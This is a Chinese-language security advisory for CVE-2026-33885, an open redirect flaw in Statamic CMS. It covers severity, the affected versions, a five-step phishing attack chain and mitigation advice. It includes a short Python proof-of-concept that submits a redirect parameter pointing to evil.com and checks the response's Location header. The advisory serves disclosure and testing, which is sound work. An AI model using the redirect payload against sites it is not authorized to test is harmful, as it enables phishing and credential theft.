CVE-2026-33885 CVSS 6.1 中危

CVE-2026-33885 Statamic CMS开放重定向漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33885

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Statamic CMS

漏洞概述

Statamic CMS在特定版本之前存在开放重定向漏洞。由于未认证端点上用于重定向验证的外部URL检测机制存在缺陷，攻击者可以绕过该验证。这可能导致用户在提交表单或进行身份验证流程后被重定向到恶意的第三方URL。攻击者常利用此类漏洞进行网络钓鱼攻击，诱导受害者输入敏感信息。

技术细节

该漏洞源于Statamic CMS在处理重定向逻辑时，对外部URL的检测验证不足。受影响的版本在验证重定向目标时存在逻辑缺陷，允许攻击者通过构造特定的请求参数绕过安全检查。攻击向量为网络（AV:N），且无需认证（PR:N），但需要用户交互（UI:R）。攻击者可以诱导用户点击包含恶意重定向参数的链接，当用户在未认证端点完成表单提交或认证流程后，应用程序会错误地将用户重定向至攻击者控制的外部站点。这种利用方式利用了用户对合法域名的信任，是网络钓鱼攻击的常见手段。

攻击链分析

STEP 1

1. 侦察

攻击者识别出运行受影响Statamic CMS版本的目标网站。

STEP 2

2. 制作

攻击者构造一个包含恶意重定向参数的URL，该参数旨在绕过外部URL检测机制。

STEP 3

3. 投递

攻击者通过电子邮件、社交媒体或其他渠道将恶意链接发送给目标用户。

STEP 4

4. 利用

用户点击链接并完成操作（如填写表单或登录），触发重定向逻辑。

STEP 5

5. 影响

用户被重定向到攻击者控制的钓鱼网站，可能导致凭据窃取或恶意软件下载。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33885 (Open Redirect)
# This script checks if the redirect parameter can be used to redirect to an external domain.

import requests

def check_open_redirect(target_url, redirect_param):
    # Construct the malicious payload
    payload = {
        redirect_param: "https://evil.com"
    }
    
    try:
        # Send request to the vulnerable endpoint
        response = requests.post(target_url, data=payload, allow_redirects=False, timeout=10)
        
        # Check the Location header for the redirect
        location = response.headers.get('Location', '')
        
        if 'evil.com' in location:
            print(f"[+] Vulnerable! Redirecting to: {location}")
            return True
        else:
            print("[-] Not vulnerable or payload invalid.")
            return False
    except Exception as e:
        print(f"Error: {e}")
        return False

# Example usage
target = "http://vulnerable-site.com/submit" # Replace with actual endpoint
check_open_redirect(target, "redirect")

影响范围

Statamic CMS < 5.73.16

Statamic CMS < 6.7.2

防御指南

临时缓解措施

如果无法立即升级，管理员应监控日志中是否存在异常的重定向请求。建议用户保持警惕，不要点击来源不明的链接，并在输入敏感信息前仔细核对浏览器地址栏中的URL，确保其指向官方网站。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表